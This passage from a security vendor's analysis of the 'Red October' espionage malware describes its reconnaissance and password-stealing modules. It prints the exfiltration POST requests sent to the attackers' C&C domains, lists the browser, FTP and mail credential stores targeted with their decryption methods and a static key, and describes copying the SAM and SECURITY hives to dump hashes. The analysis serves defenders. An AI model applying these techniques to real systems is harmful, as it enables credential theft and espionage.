It also checks registry for the value MapMenuConfigGrps (not sure what that is), extracts the data and write it somewhere:
[HKLM|HKCU]
\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced@MapMenuConfigGrps
\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced@MapMenuConfigGrps
It checks Opera config files for proxy server and other server settings.
In files opera6.ini or operaprefs.ini it looks for the following strings:
SOCKS server
WAIS server
Gopher server
FTP server
HTTP server
HTTPS server
In file prefs.js it looks for strings:
user_pref("network.proxy.socks"
user_pref("network.proxy.socks_port"
user_pref("network.proxy.ftp"
user_pref("network.proxy.ftp_port"
user_pref("network.proxy.ssl"
user_pref("network.proxy.ssl_port"
user_pref("network.proxy.http"
user_pref("network.proxy.http_port"
Then malware compresses the information stored in memory using ZLib library and encrypted with custom algorihtm.
Then it connects to the C&C server defined in AAA config and sends a POST request containing compressed, xored andbase64-encoded data:
POST http://nt-windows-online.com:80/cgi-bin/nt/sk HTTP/1.0
Host: nt-windows-online.com:80
Pragma: no-cache
Cache-Control: no-cache
Content-length: 29276
Content-Type: application/x-www-form-urlencoded
Data formatMalware collects the data in the memory allocated on the heap. The memory chunk with the prepared data starts with themagic number (4E 44 00 00) following by the filename as Unicode string (@INFO\SYSINFO_%u_%s.bin) and the size ofdata.
After the size value comes the actual information part. This part is compressed and encrypted/encoded and sent via thePOST request. Data in this part is structured in the same order as it was retrieved (so first comes the system info, then disksinfo, network adapters, URL history, etc.). All strings are Unicode – with the exception of browsing info, which is encoded nANSI.
GetWebFtp moduleKnown variants:
MD5 Compilation date (payload)
d1699431d56a690e1b84aa8dddffd28f 2012.10.22 07:05:01 (GMT)
The file is a PE DLL file, compiled with Microsoft Visual Studio 2005. No functions are exported.
Network functionAll the requests to a CnC server are of the following pattern:
POST http://%CnC%/cgi-bin/nt/sk HTTP/1.1Host: %CnC%Connection: closeContent-Length: %d\r\n\r\nDATA
The POST data is of the following structure:
Number1 + HexString + "\r\nSubject: %s\r\n\r\n" + BufferNumber1 is 16-byte value that depends on VolumeSerialNumber, Computer name and “ProductID” key inHKLM\SOFTWARE\Microsoft\Internet Explorer\Registration
Buffer is compressed with Zlib, encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.
The list of the CnCs: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com
After resolving CnC domain tries to directly send POST request.
It always expects the server to return “500” error code («Internal Server Error») in all the requests. If this error code actuallyreceived then the function returns success, and no more actions in the network function are done.
If the first sending-receiving routine returns failure then the module tries to find a proxy server and connect to it. For thatpurpose it retrieves a path to a browser in a registry:
HKLM\SOFTWARE\Classes\HTTP\shell\open\command
If the browser is InternetExplorer then checks the following keys:
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
If the browser is Firefox then reads the file %APPDATA%\Mozilla\Firefox\profiles.ini and retrieves its “Path” value. After thatreads %APPDATA%\Mozilla\Firefox\%Path%\prefs.js and retrieves proxy and port from the settings starting with “user_pref(network.proxy.*”.
If the browser is Opera then reads the file %APPDATA%\Opera\Opera\profile\opera6.ini, finds the [Proxy] section and findsstring which matches “HTTP.*=.*:.*” and retrieves server and port from it.
DllMainTries to call RegisterServiceProcess API from kernel32.dll (this API existed in Windows 9x)
Sends POST request with the Subject: “Reflebt” and “===” Buffer.
Starts searching for specific files on the following Drives: (c:,d:,e:,f:,g:)
The list of interested files:
"*.odu"
"*.pfx"
"Favorites.dat"
"FileZilla.xml"
"History.dat"
"Quick.dat"
"RushSite.xml"
"ScribeOptions.xml"
"Sites.dat"
"Sites.xml"
"SmartFTP*"
"TheBee.ini"
"account.cfn"
"account.xml"
"accounts.ini"
"addrbk.dat"
"andrq.ini"
"bpftp.dat"
"clients.dat"
"digsby.dat"
"ftplist.txt"
"global.xml"
"keychain.plist"
"signons.txt"
"sm.dat"
"smdata.dat"
"users.txt"
"wand.dat"
"wcx_ftp.ini"
"ws_ftp.ini"
Also the module enumerates network shares. The initial purpose of that seems to be searching for the same files in thenetwork shares, but there is a bug in the code which prevents from doing it. (FindFirstFile API call doesn’t get the string withwildcards as its first parameter, it only gets the string of a network share without appending a wildcard to it, so the APIalways returns INVALID_HANDLE_VALUE).
If any of these files is found, then the module adds its information to a Buffer for POST request which contains the following:file path, file contents, file creation time, last access time, last write time (all system time format), file size, the current positionin stream, the number of bytes read from file. The final Buffer can contain information about several files at once. The non-compressed Buffer size can’t exceed a definite value (a little more than 358571 bytes), and the files can be partially sent.
POST request with files is sent with the Subject: “Reflect”.
After all the files are processed the module sends the final POST request with the Subject: “Refleet” and “===” Buffer.
AuthInfo ModuleKnown variants:
MD5 Compilation date (payload)
793c82efc65a43ed249a45ec7c69a388 2012.09.05 07:02:18 (GMT)
428de53f1a1eaa040847b6456b7e5369 2012.09.05 07:02:18 (GMT)
SummaryThe file is a PE DLL file, compiled with Microsoft Visual Studio 2010. No functions are exported. Its main purpose is to stealcredential information from various popular file managers, email clients, browsers and FTP client software.
DllMain functionWhen loaded, the module retrieves its resource of type “BBB” and name “AAA”, and starts an internal plugin framework. Themain function of the module is named “task_authinfo” and is registered in the framework. Then, it starts the framework main
loop, effectively parsing the resource data and executing the list of actions encoded in the resource.
The decoded resource data for the known sample can be represented as the following script:
SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] "%removed%")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")
SetOption(conn_a.J_USER, [21] "%removed%")
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.VERSION_ID, [6] "51070")
SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")
SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")
Call(task_authinfo)The module creates two output buffers (lets call them Buffer1 and Buffer2).
The Buffer1 starts with the following string: "@INFO\AUTHINFO_%u_%s.txt"
Where %u equals to 6, %s is system time in the following format: "%04u%02u%02u_%02u%02u%02u_%03u"
If FileTimeToSystemTime API failed, it uses the default time string: "16010101_000000_000"
If wsprintfW API failed, it uses the default hardcoded filename: "@INFO\SYSINFO_X_00000000_000000_000.txt"
Also it constructs the following string: "@INFO\AUTHINFO_%u_%s.bin” for being a header of Buffer2, but the module iscompiled in that way that the retrieved data is not copied to Buffer2 and as a result is not sent to the CnC (that’s probably adeveloper’s mistake).
Buffer1 (.txt) is used to store general information text strings for logging purpose, and Buffer2 (.bin) is used to storeinformation retrieved from the registry values and file contents, including binary data.
Data collectionIn all the functions if a host is retrieved, it is also resolved to its IP.
1. Far Manager FTP data
Buffer1 sample data:
START
BEGIN : Far
FAR : regkey '%s' opened – OK
END : Far, size : %d
Extracts the following data from registry for Buffer2:
HKCU\Software\Far2\Plugins\FTP\Hosts\Item\
“HostName“, “ User“, “Password“ values data.
The “Password” value data is decrypted with a publicly known FAR FTP decryption algorithm based on simple XOR.
2. Winscp data
Buffer1 sample data:
BEGIN : Winscp
WINSCP : regvalue username found - OK
END : Winscp, size : %d
Enumerates subkeys in the following key and retrieves value data for Buffer2:
HKCU\Software\Martin Prikryl\WinSCP 2\Sessions\
Value names: “UserName”, "Password", "PortNumber", "FSProtocol", "HostName"
The “Password” value data is decrypted with a publicly known Winscp algorithm which is based on a bitwise operations andXOR using “UserName” concatenated with the “HostName” as a key.
3. TotalCommander data
Buffer1 data sample:
BEGIN : TotalCommander
TOTAL COM : wcx_ftp.ini found – OK
END : TotalCommander, size : %d
Searches for “wcx_ftp.ini” file, reads its contents and extracts values for parameters: "username", "host", "password".
The “password” value data is decrypted with a publicly known TotalCommander algorithm which is based on XOR.
4. Internet Explorer 7 and 8 data
Buffer1 data sample:
BEGIN : IE78
IE78 : regkey opened – OK
END : IE78, size : %d
Enumerates value names in the following key:
HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2\
The module creates Microsoft URL History Service instance and enumerates URLs from the browser history. It calculatesURL hash using CryptHashData API (SHA1 algorithm) and compares it with the value names from the previous registry key.If they coincide the module retrieves the registry data for the corresponding hash and decrypts the data usingCryptUnprotectData API. As a result Autocomplete passwords and the corresponding URLs are obtained.
5. Internet Explorer 6 and Outlook data
Buffer1 data sample:
BEGIN : IE6, OutlookEx
OUTLOOK EXP : LoadLibrary: pstorec.dll: %u – ERROR
IE6 : pstore contains data - OK
Attempts to load library called “pstorec.dll”. If pstorec.dll library couldn’t be loaded then starts working with registryimmediately.
If the library is successfully loaded then retrieves an interface pointer to a storage provider, enumerates provider types andsubtypes. If the Resource Type corresponds to IE Protected Site or Outlook Account then reads the data item name and thedata item buffer. As a result it retrieves IE HTTP/FTP basic authentication password and corresponding hosts, for Outlook itretrieves POP3 passwords and proceeds with working with registry. If the ResourseType corresponds to IE6 the module alsointerprets ItemName as a URL, and resolves the host to IP.
In case of Outlook enumerates subkeys of the following key and retrieves the value data in them:
HKCU\SOFTWARE\Microsoft\Internet Account Manager\Accounts\
Values: “POP3 Password2", "IMAP Password2", "HTTPMail Password2".
If one of the values data coincides with previously retrieved passwords from PStore, then retrieves the remained values data:
Account NameSMTP Email AddressSMTP ServerHTTPMail User NameHTTPMail ServerPOP3 User NamePOP3 ServerIMAP User NameIMAP Server
6. Opera, Chrome, Firefox, Thunderbird data
Buffer1 sample data:
BEGIN : Opera, GCH, MFF, THB
OPERA : wand.dat file found and read – OK
CHROME : Login Data file found and read – OK
THUNDERBIRD : signon file path '%s' found - OK
Opera: Reads file: %APPDATA%\Opera\Opera\wand.dat, decrypts it (3DES + proprietary), parses it and retrieves hosts andcorresponding passwords.
Chrome: In the Chrome processing function the module uses SQLLite lib to read file“%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data“ as a DB. It makes a query “SELECT * FROM logins”to retrieve hosts and saved passwords. It retrieves "Password_value" field to decrypt with CryptUnprotectData API call.
Firefox: Reads the file %APPDATA%\Mozilla\Firefox\profiles.ini and retrieves “User Profiles Path” from it.
Queries value in the following key to retrieve Firefox path:
HKLM\SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
In the Firefox directory tries to load nss3.dll, plc4.dll and get the following functions: NSS_Init, NSS_Shutdown,PK11_GetInternalKeySlot, PK11_FreeSlot, PK11_Authenticate, PK11SDR_Decrypt, PK11_CheckUserPassword,PL_Base64Decode.
Sequentially tries to open and read file %FirefoxProfilesPath%\signons.txt or signons2.txt or signons3.txt or sqlite.sqlite(these files used in different Firefox versions). In case of the *.txt files the module parses a file, retrieves urls, decryptsusernames and passwords using PL_Base64Decode and PK11SDR_Decrypt. In case of sqlite.sqlite it makes a query“SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins”, decrypts usernames and passwordsusing PL_Base64Decode and PK11SDR_Decrypt functions.
Thunderbird: Reads the file %APPDATA%\Thunderbird\profiles.ini and retrieves “User Profiles Path” from it. Queries valuein the following key to retrieve Thunderbird path:
HKLM\ SOFTWARE\Clients\Mail\Mozilla Thunderbird\shell\open\command
In the Thunderbird directory tries to load nss3.dll, plc4.dll and get the following functions: NSS_Init, NSS_Shutdown,PK11_GetInternalKeySlot, PK11_FreeSlot, PK11_Authenticate, PK11SDR_Decrypt, PK11_CheckUserPassword,PL_Base64Decode.
Sequentially tries to open and read file %ThunderbirdProfilesPath%\signons.txt or signons2.txt or signons3.txtor sqlite.sqlite(these files used in different Thunderbird versions). In case of the *.txt files the module parses a file, retrieves urls, decryptsusernames and passwords using PL_Base64Decode and PK11SDR_Decrypt. In case of sqlite.sqlite it makes a query“SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins”, decrypts usernames and passwordsusing PL_Base64Decode and PK11SDR_Decrypt functions.
7. The Bat data
Buffer1 data sample:
BEGIN : The Bat
THE BAT : Account.CFN '%s' read – OK
Searches for the “Account.CFN” file, decrypts it with an algorithm based on a bitwise operations and 1-byte XOR, thenextracts hostnames, usernames and passwords.
8. Filezilla data
Buffer1 data sample:
BEGIN : FileZilla
FILE ZILLA : sitemanager.xml file found – OK
FILE ZILLA : sitemanager.xml '%s' opened - OK
Searches for “sitemanager.xml” file, parses it and extracts Host, User, Port and Pass values. No decryption routines areused in processing the file.
9. CoreFTP data
Buffer1 data sample:
BEGIN : CoreFtp
CORE FTP : regkey of core ftp '%s' opened – OK
CORE FTP : password is present - OK
Tries to open the following registry key where %d is incremented starting from 0:
HKCU\Software\FTPWare\CoreFTP\Sites\%d
Retrieves the value data for: "Host", "Port", "User", "PW".
The “PW” data is decrypted using AES-128-ECB with a static key “hdfzpysvpzimorhk”.
10. IncrediMail data
Buffer1 sample data
BEGIN : IncrediMail
INCREDI : regkey Identities opened - OK
Enumerates subkeys and retrieves the value data in them:
HKCU\Software\IncrediMail\Identities\%s\Accounts\%s
Value names: "PopPort", "Technology", "PopServer", "EmailAddress", "PopPassword".
The “PopPassword” data is decrypted using a proprietary algorithm based on simple xor’ing.
Network communicationThe final Buffer (which contains only Buffer1 in observed version, Buffer2 is not added) is compressed with Zlib, encryptedwith a modified PKZIP stream cipher, and then it is Base64-encoded.
The module sequentially tries to send data to the CnCs specified in the configuration resource in a loop of 7 iterations untilsuccess. The interval between server communications is 3 seconds.
It forms the HTTP header of the following pattern:
POST http://%s:%s%s HTTP/1.0
Host: %s:%s
Pragma: no-cache
Cache-Control: no-cache
Content-length: %u
Content-Type: application/x-www-form-urlencoded
POSTDATA
The POST data is of the following structure:
Magic1 (4 bytes) + D_USER_Length (4 bytes) + Number1(4 bytes) + Magic2 (4 bytes) + D_USER (as a string) + Magic3 (4bytes) + Buffer
Magic equals to 2.
Number1 is 4-byte value that is calculated based on VolumeSerialNumber, Computer name and “ProductID” key inHKLM\SOFTWARE\Microsoft\Internet Explorer\Registration
Magic2 equals to 0.
Magic3 equals to 0xF1E1A003.
It always expects the server to return “500” error code («Internal Server Error») in all the requests. If this error code actuallyreceived then the function returns success, and no more actions in the network function are done.
If the first sending-receiving routine returns failure then the module tries to find a proxy server and connect to it. The proxyserver is found in the same way as in “Browser history” module.
Logic moduleKnown variants:
MD5 Size Compilation date (payload)
6da5d548828d113fe38f9f8406a5d697 163,840 bytes November 22, 2012
SummaryLogic module is essentially used to quickly get general information about current Windows machine and available remotenetwork shares. The collected information is instantly sent to the Command&Control server, no local files are created.This module is a Win32 DLL file. All functionality is in DllMain function, no export names defined. C runtime and utility librarycode is linked with current module. The module was compiled with MS Visual C++ 2005.
MainCalculates machine id using one of the following methods:
1. Find disk volume with Windows system directory and use volume serial number as system id;2. If previous method fails, get HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and current
computer name and hash them using simple own hashing algorithm (uses two constants 0x3B21 and 0x1C55).
The module collects the following information about current system:
1. Windows version2. Computer name3. User name4. Local disk drives info:
Volume serial numberFilesystem name and flagsFree and used disk space
Windows and Temporary directory pathsEnvironment variablesActive and OEM codepagesNetwork adapter MAC addressAccessible network shares and remote computer IPsList of local processes with all loaded modules
This information is later submitted to the C&C server.
List of processes and loaded modules collected by the malware
When submitting to C&C server, it issues HTTP POST request, with hardcoded string Subject: LOGIC and appended data. Itis capable of finding and using local proxy server settings of Firefox, Opera and Internet Explorer. The submitted data is Zlib-compressed, encrypted and Base64-encoded. It seems to be using rather old Zlib version 1.1.4, which was introduced inMarch of 2002. For encryption it uses a modified version of PKZIP cipher. For the reference, it uses the following constants:0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.
C&C server connection information is stored in hardcoded string/dword values, i.e.:
Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com
Server port: 80
URL path: /cgi-bin/nt/sk
The modules attempts to connect to the C&C server 5 times with delay of 1 minute. If the server doesn’t respond it triesanother one or gives up.
ILogic moduleKnown variants:
MD5 Size Compilation date (payload)
8a34088f776ff9c4857549b24eebcabb 151,552 bytes November 22, 2012
SummaryILogic module is essentially used to quickly grab Internet Explorer URL history from the local system. The collectedinformation is instantly sent to the Command&Control server.This module is a Win32 DLL file. All functionality is in DllMain function, no export names defined. C runtime and utility librarycode is linked with current module. The module was compiled with MS Visual C++ 2005.
MainCalculates machine id using one of the following methods:
1. Find disk volume with Windows system directory and use volume serial number as system id;2. If previous method fails, get HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and current
computer name and hash them using simple own hashing algorithm (uses two constants 0x3B21 and 0x1C55).
The module creates COM object by hardcoded CLSID=3C374a40-BAE4-11CF-BF7D-00AA006946EE which stands forMicrosoft Url History Service. After that the module calls internal object methods to fetch browsing history. This information islater submitted to the C&C server.
Data buffer created by the malware containing URL history
When submitting to C&C server, it issues HTTP POST request, with plaintext string Subject: ILogic and appended data. It iscapable of finding and using local proxy server settings of Firefox, Opera and Internet Explorer. The submitted data is Zlib-compressed, encrypted and Base64-encoded. It seems to be using rather old Zlib version 1.1.4, which was introduced inMarch of 2002. For encryption it uses a modified version of PKZIP cipher. For the reference, it uses the following constants:0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.
C&C server connection information is stored in hardcoded string/dword values, i.e.:
Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com
Server port: 80
URL path: /cgi-bin/nt/sk
The modules attempts to connect to the C&C server 5 times with delay of 1 minute. If the server doesn’t respond it triesanother one or gives up.
Repeat2 moduleKnown variants:
MD5 Size Compilation date (payload)
2be140e6abf23d6acc5fef0c11c07784 155,648 bytes November 22, 2012
SummaryRepeat2 module is essentially used to quickly get listing from remote shares available in Windows network neighborhood.The collected information is instantly sent to the Command&Control server.This module is a Win32 DLL file. All functionality is in DllMain function, no export names defined. C runtime and utility librarycode is linked with current module. The module was compiled with MS Visual C++ 2005.
MainCalculates machine id using one of the following methods:
1. Find disk volume with Windows system directory and use volume serial number as system id;2. If previous method fails, get HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and current
computer name and hash them using simple own hashing algorithm (uses two constants 0x3B21 and 0x1C55).
The module use Windows API to locate available Windows shares and get directory listings from the remote computers. Thisinformation is later submitted to the C&C server.
Hardcoded value of Subject field used in data submission stage (userid is blurred)
When submitting to C&C server, it issues HTTP POST request, with hardcoded string Subject: REPEAT2 and appendeddata. It is capable of finding and using local proxy server settings of Firefox, Opera and Internet Explorer. The submitteddata is Zlib-compressed, encrypted and Base64-encoded. It seems to be using rather old Zlib version 1.1.4, which wasintroduced in March of 2002. For encryption it uses a modified version of PKZIP cipher. For the reference, it uses thefollowing constants: 0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.
C&C server connection information is stored in hardcoded string/dword values, i.e.:
Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com
Server port: 80
URL path: /cgi-bin/nt/sk
The modules attempts to connect to the C&C server 5 times with delay of 1 minute. If the server doesn’t respond it triesanother one or gives up.
Reference moduleKnown variants:
MD5 Size Compilation date (payload)
a2180b45002ee90ad0ec1f04ef90cb01 151,552 bytes November 22, 2012
SummaryReference module is essentially used to quickly grab directory/file listings of all drives attached to the local system (includingnetwork shares and usb drives). The collected information is instantly sent to the Command&Control server.This module is a Win32 DLL file. All functionality is in DllMain function, no export names defined. C runtime and utility librarycode is linked with current module. The module was compiled with MS Visual C++ 2005.
MainCalculates machine id using one of the following methods:
1. Find disk volume with Windows system directory and use volume serial number as system id;2. If previous method fails, get HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID value and current
computer name and hash them using simple own hashing algorithm (uses two constants 0x3B21 and 0x1C55).
The module iterates through all attached drives and browses their contents. It collects directory listings including filenames,date of last modification and sizes. This information is later submitted to the C&C server.
Data buffer created by the malware containing file listing
When submitting to C&C server, it issues HTTP POST request, with plaintext string Subject: REFERENCE and appendeddata. It is capable of finding and using local proxy server settings of Firefox, Opera and Internet Explorer. The submitteddata is Zlib-compressed, encrypted and Base64-encoded. It seems to be using rather old Zlib version 1.1.4, which wasintroduced in March of 2002. For encryption it uses a modified version of PKZIP cipher. For the reference, it uses thefollowing constants: 0x12345679, 0x1E278E7A, 0x560397F7, 0x343FD, 0x269EC3.
C&C server connection information is stored in hardcoded string/dword values, i.e.:
Server domains: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com
Server port: 80
URL path: /cgi-bin/nt/sk
The modules attempts to connect to the C&C server 5 times with delay of 1 minute. If the server doesn’t respond it triesanother one or gives up.
“Red October”. Detailed Malware Description 3. SecondStage of Attack - SecurelistИсточник: http://www.securelist.com/en/analysis/204792264/Red_October_Detailed_Malware_Description_3_Second_Stage_of_Attack
“Red October”. Detailed Malware Description 3. Second Stage of AttackFirst stage of attack
1. Exploits2. Dropper3. Loader Module4. Main component
Second stage of attack1. Modules, general overview2. Recon group3. Password group4. Email group5. USB drive group6. Keyboard group7. Persistence group8. Spreading group9. Mobile group
10. Exfiltration group
3. Password groupPswSuperMailRu moduleKnown variants:
MD5 Size Compilation date (payload)
7b669c32e6ee2c65bec5e09024fc5415 237,568 January 14th, 2011
b7327bfa4a101a21f0cc1b366aa8e107 237,568 March 29th, 2011
a39fa7340b2f1d7b42342b3e2f06df71 266,24 August 16th, 2010
cd170625655424149573c88c59716cc4 270,336 February 11, 2011
f60436b984962e741b81720ea604ad27 241,664 August 16th, 2010
2cf23cd8a7f85529576ba6c759f8cf37 270,336 March 29th, 2011
9bb32272be87a4dde8c8b05f49ded9f7 266,24 January 14th, 2011
ed72b6150e9fbc8f71e61dfea682a303 237,568 February 11th, 2011
The files are all PE exe files between 232 KB and 264 KB, compiled with Microsoft Visual Studio 2005. It is written in C/C++.
Entrypoint, unpacking stub, and obfuscationRelated binaries are heavily packed with a custom packer. The packer disrupts basic software breakpoints and some apihooking techniques, because it decrypts the original exe’s section contents onto heaps in-memory and then writes the
decrypted code and .data, .rdata contents back over the original sections, hopping back into the decrypted code andexecuting from there.
SummaryAt its OEP, the module further retrieves environment information, and then creates a mutex with the string "SUPER MUTEX".Then the module steals authentication credentials from mail.ru agent software and attempts to steal open and savedattachments on the system from the Outlook Secure Temp Folder. The executable then fails to write its own contents toanother executable file in tmp and maintain persistence on the system. Network functionality is absent from this module.
Credential StealingThe module steals Mail.Ru Mail Agent account credentials by reading relevant registry in order to extract the passwords ordecrypt them depending of the version. The two locations this data is accessed are
Registry key/value pair for Mail.Ru Agent version < 5.2Registry key: HKCU\Software\Mail.Ru\Agent\magent_logins,binary value: ####passwordRegistry key/value pair for Mail.Ru Agent version 5.2 to 5.6 Registry key: HKCU\Software\Mail.Ru\Agent\magent_logins2binary value: ####passwordRegistry key/value pair for Mail.Ru Agent version >= 5.7 (Last version 6 is also supported)Registry key: HKCU\Software\Mail.Ru\Agent\magent_logins3binary value: ####passwordText file used by Mail.Ru Agent to store Blowfish encryption key%APPDATA%\Mra\Update\ver.txt
The contents of this registry keys are read and the blowfish key stored inside “ver.txt” is used to decrypt the passwords, inversion 5.7 and above.
All actions are logged with time stamp, and then encrypted and written to %temp%\~avp2.log.
The module will attempt to access “ver.txt” which is protected on the system. If it can read it using standard API functions, ituses NTFS low level access.
In order to do so, it uses the DeviceIoControl API function with the “FSCTL_GET_NTFS_VOLUME_DATA” and"FSCTL_GET_NTFS_FILE_RECORD" IOCTLs.
The data of this file will also be written to %temp%\~mslog.tmp, which is a backup of “ver.txt”After the module will build anew string with the current timestamp followed by delimiting dashes and indication that the module has finished running, like“2012:11:10:10:22:34-------PROGA END”. This string will be written to the ~avp2.log file.
Here is an example of a decrypted ~avp2.log file:
"2012:11:22:17:21:44"-------PROGA START-----"2012:11:22:17:21:44"ERROR ACCESS file ver.txt"2012:11:22:17:21:44"FILE SYSTEM NTFS"2012:11:22:17:21:44"PROBING GET FILE LOW LIVEL"2012:11:22:17:21:44"ACCESS LOW LIVEL OK!!!!"2012:11:22:17:21:44"REG OPEN KEY[Software\Mail.Ru\Agent\magent_logins3]"2012:11:22:17:21:44"SUB KEY[000#[email protected]]"2012:11:22:17:21:44"uin(0)[000#[email protected]] passwd(0)[%removed%]"2012:11:22:17:21:44"-------PROGA END-----
The string between "[" and "]" is binary value of MD5 Hash of the Mail.ru Agent password.
All restored credentials are also stored encrypted in the “~pass2.pwl” file without the time stamp information and how theywere accessed.
Meanwhile “PROGA” word used in here might refer to transliteration of Russian slang “ПРОГА”, which literally means anapplication or a program.
Attachment stealingThe module will finally attempt to steal open attachments or attachments that were open when the machine or Outlookapplication shutdown unexpectedly. It identifies and collects these files from a directory path that looks like “C:\Documentsand Settings\%username%\Local Settings\Temporary Internet Files\OLK%xxx%”.
Failed persistenceThe module then attempts to maintain some persistence on the system by repeating the routine. It creates%temp%\19d400.msv, and attempts to write a copy of its own executable contents to it. Oddly, the WriteFile size parameteris set to “0” and the write fails. It then attempts to run this 19d400.msv file by calling CreateProcessA on it, which also fails.The module thread terminates the process.
Finally, it is interesting that network functionality is absent from this module.
Interesting decrypted runtime strings:19d400.msvSoftware\Mail.Ru\Agent\magent_logins2Software\Mail.Ru\Agent\magent_logins~pass.pwl~avp.logwww.mail.ruProcessRead ok!OPEN PROCESS agent_mail.ru OK!%s-------PROGA END------------PROGA START-----SUPER MUTEX19d400.msv~mslog.tmp%sPROBING GET FILE LOW LIVEL%sACCESS LOW LIVEL OK!!!!%sERROR OPENFILE%sERROR GET ACCESS LOW LIVEL
PswOutlook moduleKnown variants:
MD5 Compilation date
f6e1637e04b33a3e0c57ab355d3e677e 2010.11.30 07:10:32 (GMT)
fa66821fd895b3814e501b804176ef98 2011.02.23 12:41:29 (GMT)
SummaryThe file is a PE EXE file, compiled with Microsoft Visual Studio 2008. All the functionality is implemented in the WinMainfunction. There are 2 known variants of this module in over 50 files with identical behavior.
Like PswSuperMailru, this highly-obfuscated module is very different from others. Its main purpose is to steal email credentialinformation of the current user. This is achieved by reading system protected storage and system registry. The result is
stored in an encrypted file, after that the application self-removes.
Main functionThis module starts from decrypting pieces of information carefully puzzled in the file body. The puzzle contains extra librarynames, export function names, their parameters and set of internal references. The encryption algorithm reminds PKZIPencryption but seems to be modified.
Decrypted data is carefully collected and filled in a set of internal objects. Next, module connects to the local registry usingRegConnectRegistry system API call. This is not clear why the developers decided to use RegConnectRegistry call. Theyeither tried to bypass some local IDS/IPS systems by avoiding usage of RegOpenKey/RegOpenKeyEx calls or theapplication was designed to connect to remote computers as well. In all samples we have observed, lpMachineNameparameter is set to NULL meaning to connect to local registry.
It dumps MS Outlook account information from the following registry keys:
HKCU\Software\Microsoft\Internet Account Manager HKCU\Software\Microsoft\Office\Outlook\OMI AccountManager\Accounts HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows MessagingHKCU\Subsystem\Profiles\Microsoft\Outlook Internet Settings HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
After that it attempts to access and dump local protected storage identities information via PStorec.dll API.
Collected information is stored in encrypted file: %Temp%\{B30BD41D-46E7-458B-F412-4D7F80CCAD0F}. The file containsa 32bit hash of data in the end.
This module never communicates with the C&C server and works as a standalone tool. In the end of execution before exitingapplication it runs self-removal procedure as described below.
Self-removal procedureWhen the module needs to end the execution and self-remove, it spawns a %COMSPEC% process (cmd.exe orcommand.com on older systems) HKCU\Software\Microsoft\Internet Account Manager using the following commandline:
cmd.exe /c del /F /A “%MODULE_PATH%”>> NULL
This procedure is very unreliable as it is prone to race-condition issues which might result in modules remaining undeleted.
MSHash moduleKnown variants:
MD5 Compilation date
3538fea2c2f9a7117a6a919c87112731 2011.11.01 15:04:58 (GMT)
a008d1ec659c3758e95bc3f0aafbe3a5 2011.08.05 07:40:37 (GMT)
68d72e12c402038195175b568b3dd0bb 2012.10.22 07:01:30 (GMT)
4b62cc78508b46d74cdd172dc493ec8a 2011.11.01 15:04:58 (GMT)
SummaryThis module is a standalone executable, which is essentially a tool to dump cached domain password hashes, and locallystored sensitive information, such as LSA secrets. It uses direct disk access to bypass system registry ACLs. After executionthe module self-removes.
First, it uses direct disk access to copy registry files from %SYSTEM%\config\ directory:
%SYSTEM%\config\sam -> %Temp%\ksm%SYSTEM%\config\system -> %Temp\kss%SYSTEM%\config\SECURITY -> %Temp%\kse
Then module fetches available cached domain account hashes as well as local system LSA secrets. The later may containlogins and passwords from various services in plaintext. Also, it fetches Syskey bootkey secret and appends it to the output.
The result is stored in an encrypted file of custom binary format which is located in%TMP%\smrdprev<RANDOM_16DIGITS_HEXNUMBER>.tmp. The contents of the file contains internal file reference string,including date and time when it was created, i.e. "@MSHASH\SAMHASH_2_20121002_034519.txt". This is probablysuggested relative path and file name during data extraction procedure on the attackers system.
The module also creates an encrypted log file with detailed information of program execution. It is stored in similar file“%TMP%\smrdprev.tmp”, the hex number depends on current system boot time. It is encrypted in the same way as the mainoutput file, using custom cryptoalgorithm based on AMPRNG cryptomethod.
Current module also tags current system by changing the following registry keys:
HKCU\Software\Microsoft\ADOSoftware32\ProductID = binary value of 20 bytes (System ID)HKLM\Software\Microsoft\ADOSoftware32\ProductID = binary value of 20 bytes (System ID)
System ID is calculated as SHA1-hash of System Drive Volume Serial Number and HKLM\SOFTWARE\Microsoft\InternetExplorer\Registration\ProductID value. These keys remain after malware self-removes an may serve as good way to identifyif your system was hit by this module in the past.
Most of the cryptoroutines such as DES, RC4, HMAC_MD5, MD4 are used from statically linked OpenSSL 0.9.8g library.
